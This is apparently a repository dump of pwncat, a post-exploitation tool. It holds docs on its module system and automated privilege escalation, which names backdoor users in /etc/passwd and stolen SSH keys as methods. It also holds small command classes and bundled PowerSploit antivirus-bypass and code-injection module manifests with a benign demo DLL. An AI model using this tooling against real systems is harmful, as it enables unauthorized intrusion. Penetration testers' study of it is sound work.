7 | the ``pwncat/modules`` directory, but more modules can be loaded from a custom
8 | location via the ``load`` command.
9 |
10 | Module Contexts
11 | ---------------
12 |
13 | You can enter a module "context" which means that any ``set`` commands will
14 | operate specifically on that modules arguments by default. This is useful
15 | when a module takes a large number of arguments or complex arguments. In
16 | this case, the local prompt prefix changes to ``([module_name])`` vice
17 | the normal ``(local)``. The context is exited automatically after using the
18 | ``run`` command.
19 |
20 | When in a module context, commands like ``info`` and ``run`` no longer
21 | require the module name as a parameter. It is inferred by the current context.
22 |
23 | Locating Modules
24 | ----------------
25 |
26 | Modules are located using the ``search`` command at the local prompt. You can
27 | also locate modules using tab completion at the local prompt.
28 |
29 | .. code-block:: bash
30 |
31 | search enumerate.*
32 |
33 | Viewing Documentation
34 | ---------------------
35 |
36 | Module documentation can be viewed with the ``info`` command. When within
37 | a module context, the module name is inferred from the current context
38 | if not specified.
39 |
40 | .. code-block:: bash
41 |
42 | info escalate.auto
43 |
44 | Running Modules
45 | ---------------
46 |
47 | The ``run`` command is used to execute a module. The module name is inferred
48 | from the module context if not specified. Key-value parameters can be specified
49 | in the ``run`` command or with ``set`` within a module context.
50 |
51 | .. code-block:: bash
52 |
53 | run escalate.auto user=root
54 | use escalate.auto
55 | set user root
56 | run
57 |
--------------------------------------------------------------------------------
/docs/source/privesc.rst:
--------------------------------------------------------------------------------
1 | Automated Privilege Escalation
2 | ==============================
3 |
4 | pwncat has the ability to locate and exploit privilege escalation vulnerabilities. The vulnerabilities
5 | are identified through enumeration, and can be exploited through the ``escalate`` command. Internally,
6 | pwncat has two types of escalation objects. Firstly, there are abilities. These are actions
7 | which we are able to perform with the permissions of a different user on the target. The second type
8 | of objects are escalations. Escalations utilize one or more abilities to achieve a session as the
9 | targeted user.
10 |
11 | As an example, abilities could be things such as:
12 |
13 | * File Write
14 | * File Read
15 | * Binary execution
16 |
17 | Escalations could be things such as:
18 |
19 | * Executing a shell (the simplest option)
20 | * Reading user private keys and ssh-ing to localhost
21 | * Writing private keys
22 | * Implanting a backdoor user in /etc/passwd (if file-write as root is available)
23 |
24 | Invoking Privilege Escalation
25 | -----------------------------
26 |
27 | There are two ``escalate`` subcommands. In order to locate direct escalation vectors, you can use the
28 | ``list`` subcommand. This will use the enumeration framework to locate any escalations that may be
29 | possible as the active user.
30 |
31 | .. code-block:: bash
32 |
33 | # List direct escalations for any user
34 | (local) pwncat$ escalate list
35 | # List direct escalations to the specified user
36 | (local) pwncat$ escalate list -u root
37 |
38 | Escalation can be triggered with the ``run`` subcommand. This command will first attempt to escalate
39 | directly to the requested user. If no direct escalations are possible, it will try to recursively
40 | escalate through other users based on the available direct escalations.
41 |
42 | .. code-block:: bash
43 |
44 | # Escalate to root
45 | (local) pwncat$ escalate run
46 | # Escalate to a specified user
47 | (local) pwncat$ escalate run -u john
48 |
--------------------------------------------------------------------------------
/pwncat/channel/ssl_connect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import ssl
3 |
4 | from pwncat.channel import ChannelError
5 | from pwncat.channel.connect import Connect
6 |
7 |
8 | class SSLConnect(Connect):
9 | def __init__(self, **kwargs):
10 | super().__init__(**kwargs)
11 |
12 | def _socket_connected(self, client):
13 | try:
14 | self.context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
15 | self.context.check_hostname = False
16 | self.context.verify_mode = ssl.VerifyMode.CERT_NONE
17 |
18 | client = self.context.wrap_socket(client)
19 | except ssl.SSLError as exc:
20 | raise ChannelError(self, str(exc))
21 |
22 | super()._socket_connected(client)
23 |
--------------------------------------------------------------------------------
/pwncat/commands/alias.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | from pwncat.util import console
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
7 | class Command(CommandDefinition):
8 | """
9 | Alias an existing command with a new name. Specifying no alias or command
10 | will list all aliases. Specifying an alias with no command will remove the
11 | alias if it exists.
12 | """
13 |
14 | def get_command_names(self):
15 | return [c.PROG for c in self.manager.parser.commands]
16 |
17 | PROG = "alias"
18 | ARGS = {
19 | "alias": Parameter(Complete.NONE, help="name for the new alias", nargs="?"),
20 | "command": Parameter(
21 | Complete.CHOICES,
22 | metavar="COMMAND",
23 | choices=get_command_names,
24 | help="the command the new alias will use",
25 | nargs="?",
26 | ),
27 | }
28 | LOCAL = True
29 |
30 | def run(self, manager, args):
31 | if args.alias is None:
32 | for name, command in manager.parser.aliases.items():
33 | console.print(
34 | f" [cyan]{name}[/cyan] \u2192 [yellow]{command.PROG}[/yellow]"
35 | )
36 | elif args.command is not None:
37 | # This is safe because of "choices" in the argparser
38 | manager.parser.aliases[args.alias] = [
39 | c for c in manager.parser.commands if c.PROG == args.command
40 | ][0]
41 | else:
42 | del manager.parser.aliases[args.alias]
43 |
--------------------------------------------------------------------------------
/pwncat/commands/back.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
6 | class Command(CommandDefinition):
7 | """
8 | Return to the remote terminal
9 | """
10 |
11 | PROG = "back"
12 | ARGS = {}
13 |
14 | def run(self, manager: "pwncat.manager.Manager", args):
15 | # This is caught by ``CommandParser.run`` which interprets
16 | # it as a `C-d` sequence, and returns to the remote prompt.
17 | raise EOFError
18 |
--------------------------------------------------------------------------------
/pwncat/commands/bind.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 |
4 | from pwncat.util import console
5 | from pwncat.config import KeyType
6 | from pwncat.commands import Complete, Parameter, CommandDefinition
7 |
8 |
9 | class Command(CommandDefinition):
10 | """
11 | Create key aliases for when in raw mode. This only works from platforms
12 | which provide a raw interaction (such as linux).
13 | """
14 |
15 | PROG = "bind"
16 | ARGS = {
17 | "key": Parameter(
18 | Complete.NONE,
19 | metavar="KEY",
20 | type=KeyType,
21 | help="The key to map after your prefix",
22 | nargs="?",
23 | ),
24 | "script": Parameter(
25 | Complete.NONE,
26 | help="The script to run when the key is pressed",
27 | nargs="?",
28 | ),
29 | }
30 | LOCAL = True
31 |
32 | def run(self, manager, args):
33 | if args.key is None:
34 | for key, binding in manager.config.bindings.items():
35 | console.print(f" [cyan]{key}[/cyan] = [yellow]{repr(binding)}[/yellow]")
36 | elif args.key is not None and args.script is None:
37 | if args.key in manager.config.bindings:
38 | del manager.config.bindings[args.key]
39 | else:
40 | manager.config.bindings[args.key] = args.script
41 |
--------------------------------------------------------------------------------
/pwncat/commands/exit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
6 | class Command(CommandDefinition):
7 | """
8 | Exit the interactive prompt. If sessions are active, you will
9 | be prompted to confirm. This shouldn't be run from a configuration
10 | script.
11 | """
12 |
13 | PROG = "exit"
14 | ARGS = {}
15 | LOCAL = True
16 |
17 | def run(self, manager, args):
18 | raise pwncat.manager.InteractiveExit
19 |
--------------------------------------------------------------------------------
/pwncat/commands/help.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import textwrap
3 |
4 | import rich.box
5 | from rich.table import Table, Column
6 |
7 | import pwncat
8 | from pwncat.util import console
9 | from pwncat.commands import Complete, Parameter, CommandDefinition
10 |
11 |
12 | class Command(CommandDefinition):
13 | """
14 | List known commands and print their associated help documentation.
15 | """
16 |
17 | def get_command_names(self):
18 | try:
19 | # Because we are initialized prior to `manager.parser`,
20 | # we have to wrap this in a try-except block.
21 | yield from [cmd.PROG for cmd in self.manager.parser.commands]
22 | except AttributeError:
23 | return
24 |
25 | PROG = "help"
26 | ARGS = {"topic": Parameter(Complete.CHOICES, choices=get_command_names, nargs="?")}
27 | LOCAL = True
28 |
29 | def run(self, manager: "pwncat.manager.Manager", args):
30 | if args.topic:
31 | for command in manager.parser.commands:
32 | if command.PROG == args.topic:
33 | if command.parser is not None:
34 | command.parser.print_help()
35 | else:
36 | console.print(textwrap.dedent(command.__doc__).strip())
37 | break
38 | else:
39 | table = Table(
40 | Column("Command", style="green"),
41 | Column("Description", no_wrap=True),
42 | box=rich.box.SIMPLE,
43 | )
44 |
45 | for command in manager.parser.commands:
46 | doc = command.__doc__
47 | if doc is None:
48 | doc = ""
49 | else:
50 | doc = textwrap.shorten(
51 | textwrap.dedent(doc).strip().replace("\n", ""), 60
52 | )
53 |
54 | table.add_row(command.PROG, doc)
55 |
56 | console.print(table)
57 |
--------------------------------------------------------------------------------
/pwncat/commands/lcd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import os
3 | import pathlib
4 |
5 | import pwncat
6 | from pwncat.commands import Complete, Parameter, CommandDefinition
7 |
8 |
9 | class Command(CommandDefinition):
10 | """Change the local current working directory"""
11 |
12 | PROG = "lcd"
13 | ARGS = {
14 | "path": Parameter(Complete.LOCAL_FILE),
15 | }
16 |
17 | def run(self, manager: "pwncat.manager.Manager", args):
18 |
19 | # Expand `~`
20 | path = pathlib.Path(args.path).expanduser()
21 |
22 | # Ensure the directory exists
23 | if not path.is_dir():
24 | self.parser.error(f"{path}: not a directory")
25 |
26 | # Change to that directory
27 | os.chdir(str(path))
28 |
--------------------------------------------------------------------------------
/pwncat/commands/leave.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
7 | class Command(CommandDefinition):
8 | """
9 | Leave a layer of execution from this session. Layers are normally added
10 | as sub-shells from escalation modules.
11 | """
12 |
13 | PROG = "leave"
14 | ARGS = {
15 | "count": Parameter(
16 | Complete.NONE,
17 | type=int,
18 | default=1,
19 | nargs="?",
20 | help="number of layers to remove (default: 1)",
21 | ),
22 | "--all,-a": Parameter(
23 | Complete.NONE,
24 | action="store_true",
25 | help="leave all active layers",
26 | ),
27 | }
28 |
29 | def run(self, manager: "pwncat.manager.Manager", args):
30 |
31 | try:
32 | if args.all:
33 | args.count = len(manager.target.layers)
34 |
35 | for i in range(args.count):
36 | manager.target.layers.pop()(manager.target)
37 |
38 | manager.target.platform.refresh_uid()
39 | except IndexError:
40 | manager.target.log("[yellow]warning[/yellow]: no more layers to leave")
41 |
--------------------------------------------------------------------------------
/pwncat/commands/load.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.commands import Complete, Parameter, CommandDefinition
5 |
6 |
7 | class Command(CommandDefinition):
8 | """
9 | Load modules from the specified directory. This does not remove
10 | currently loaded modules, but may replace modules which were already
11 | loaded. Also, prior to loading any specified modules, the standard
12 | modules are loaded. This normally happens only when modules are first
13 | utilized. This ensures that a standard module does not shadow a custom
14 | module. In fact, the opposite may happen in a custom module is defined
15 | with the same name as a standard module.
16 | """
17 |
18 | PROG = "load"
19 | ARGS = {
20 | "path": Parameter(
21 | Complete.LOCAL_FILE,
22 | help="Path to a python package directory to load modules from",
23 | nargs="+",
24 | )
25 | }
26 | DEFAULTS = {}
27 | LOCAL = True
28 |
29 | def run(self, manager: "pwncat.manager.Manager", args):
30 |
31 | manager.load_modules(*args.path)
32 |
--------------------------------------------------------------------------------
/pwncat/commands/local.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import subprocess
3 |
4 | import pwncat
5 | from pwncat.commands import CommandDefinition
6 |
7 |
8 | class Command(CommandDefinition):
9 | """
10 | Run a local shell command on your attacking machine
11 | """
12 |
13 | PROG = "local"
14 | ARGS = None
15 | LOCAL = True
16 |
17 | def run(self, manager: "pwncat.manager.Manager", args):
18 | subprocess.run(args, shell=True)
19 |
--------------------------------------------------------------------------------
/pwncat/commands/lpwd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from pathlib import Path
3 |
4 | import pwncat
5 | from pwncat.util import console
6 | from pwncat.commands import CommandDefinition
7 |
8 |
9 | class Command(CommandDefinition):
10 | """Print the local current working directory"""
11 |
12 | PROG = "lpwd"
13 | ARGS = {}
14 |
15 | def run(self, manager: "pwncat.manager.Manager", args):
16 |
17 | console.print(Path.cwd())
18 |
--------------------------------------------------------------------------------
/pwncat/commands/reset.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import pwncat
3 | from pwncat.commands import CommandDefinition
4 |
5 |
6 | class Command(CommandDefinition):
7 | """
8 | Reset the remote terminal to the standard pwncat settings. This will set
9 | your remote prompt and synchronize the terminal state. It will also ensure
10 | that the HISTFILE, PROMPT_COMMAND, and other common shell settings are setup
11 | properly. Run this if you ever end up in a peculiar situation on the remote
12 | host and are unable to reset it manually.
13 | """
14 |
15 | PROG = "reset"
16 | ARGS = {}
17 | DEFAULTS = {}
18 | LOCAL = False
19 |
20 | def run(self, manager: "pwncat.manager.Manager", args):
21 |
22 | manager.log("[yellow]warning[/yellow]: reset not implemented in new framework")
23 | # pwncat.victim.reset()
24 |
--------------------------------------------------------------------------------
/pwncat/commands/search.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import textwrap
3 |
4 | from rich import box
5 | from rich.table import Table, Column
6 |
7 | import pwncat
8 | from pwncat.util import console
9 | from pwncat.commands import Complete, Parameter, CommandDefinition
10 |
11 |
12 | class Command(CommandDefinition):
13 | """
14 | View info about a module
15 | """
16 |
17 | PROG = "search"
18 | ARGS = {
19 | "module": Parameter(
20 | Complete.NONE,
21 | help="glob pattern",
22 | )
23 | }
24 |
25 | def run(self, manager: "pwncat.manager.Manager", args):
26 |
27 | modules = list(manager.target.find_module(f"*{args.module}*"))
28 | min_width = max(
29 | len(module.name.removeprefix("agnostic.")) for module in modules
30 | )
31 |
32 | table = Table(
33 | Column(header="Name", style="cyan", min_width=min_width),
34 | Column(header="Description"),
35 | title="Results",
36 | box=box.MINIMAL_DOUBLE_HEAD,
37 | expand=True,
38 | )
39 |
40 | for module in modules:
41 | # Rich will ellipsize the column, but we need to squeeze
42 | # white space and remove newlines. `textwrap.shorten` is
43 | # the easiest way to do that, so we use a large size for
44 | # width.
45 | description = module.__doc__ if module.__doc__ is not None else ""
46 | module_name = module.name.removeprefix("agnostic.")
47 |
48 | if self.manager.target is not None:
49 | module_name = module_name.removeprefix(
50 | self.manager.target.platform.name + "."
51 | )
52 |
53 | table.add_row(
54 | f"[cyan]{module_name}[/cyan]",
55 | textwrap.shorten(
56 | description.replace("\n", " "), width=80, placeholder="..."
57 | ),
58 | )
59 |
60 | console.print(table)
61 |
--------------------------------------------------------------------------------
/pwncat/commands/shortcut.py:
--------------------------------------------------------------------------------
1 | from pwncat.commands import Complete, Parameter, CommandDefinition
2 |
3 |
4 | class Command(CommandDefinition):
5 |
6 | PROG = "shortcut"
7 | ARGS = {
8 | "prefix": Parameter(
9 | Complete.NONE, help="the prefix character used for the shortcut"
10 | ),
11 | "command": Parameter(Complete.NONE, help="the command to execute"),
12 | }
13 | LOCAL = True
14 |
15 | def run(self, manager, args):
16 |
17 | for command in manager.parser.commands:
18 | if command.PROG == args.command:
19 | manager.parser.shortcuts[args.prefix] = command
20 | return
21 |
22 | self.parser.error(f"{args.command}: no such command")
23 |
--------------------------------------------------------------------------------
/pwncat/commands/use.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import pwncat
4 | from pwncat.util import console
5 | from pwncat.commands import Complete, Parameter, CommandDefinition, get_module_choices
6 |
7 |
8 | class Command(CommandDefinition):
9 | """
10 | Set the currently used module in the config handler
11 | """
12 |
13 | PROG = "use"
14 | ARGS = {
15 | "module": Parameter(
16 | Complete.CHOICES,
17 | choices=get_module_choices,
18 | metavar="MODULE",
19 | help="the module to use",
20 | )
21 | }
22 | LOCAL = False
23 |
24 | def run(self, manager: "pwncat.manager.Manager", args):
25 |
26 | try:
27 | module = list(manager.target.find_module(args.module, exact=True))[0]
28 | except IndexError:
29 | console.log(f"[red]error[/red]: {args.module}: no such module")
30 | return
31 |
32 | manager.target.config.use(module)
33 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'AntivirusBypass.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'CodeExecution.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Company or vendor of this module
16 | CompanyName = ''
17 |
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 |
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Code Execution Module'
23 |
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
33 | }
34 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
10 | extern "C" __declspec( dllexport ) char* StringFunc()
11 | {
12 | ostream *outputStream = NULL;
13 |
14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.
15 | //outputStream = &cout;
16 |
17 | ostringstream *stringStream = new ostringstream();
18 | outputStream = stringStream;
19 |
20 | (*outputStream) << "String DLL function is working" << endl << endl;
21 |
22 | string output = (*stringStream).str();
23 | const char* outputStr = output.c_str();
24 |
25 | char* out = new char[output.size()+1];
26 | strcpy(out, outputStr);
27 | out[output.size()] = '\0';
28 |
29 |
30 | return out;
31 | }
32 |
33 | extern "C" __declspec( dllexport ) void VoidFunc()
34 | {
35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
36 | return;
37 | }
38 |
39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
40 | {
41 | wostream *outputStream = NULL;
42 |
43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.
44 | outputStream = &wcout;
45 |
46 | wostringstream *stringStream = new wostringstream();
47 | outputStream = stringStream;
48 |
49 | (*outputStream) << L"WString DLL function is working" << endl << endl;
50 |
51 | wstring output = (*stringStream).str();
52 | const wchar_t* outputStr = output.c_str();
53 |
54 | wchar_t* out = new wchar_t[output.size()+1];
55 | wcscpy(out, outputStr);
56 | out[output.size()] = '\0';
57 |
58 |
59 | return out;
60 | }
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef DEMODLL_EXPORTS
8 | #define DEMODLL_API __declspec(dllexport)
9 | #else
10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 |
13 | using namespace std;
14 |
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
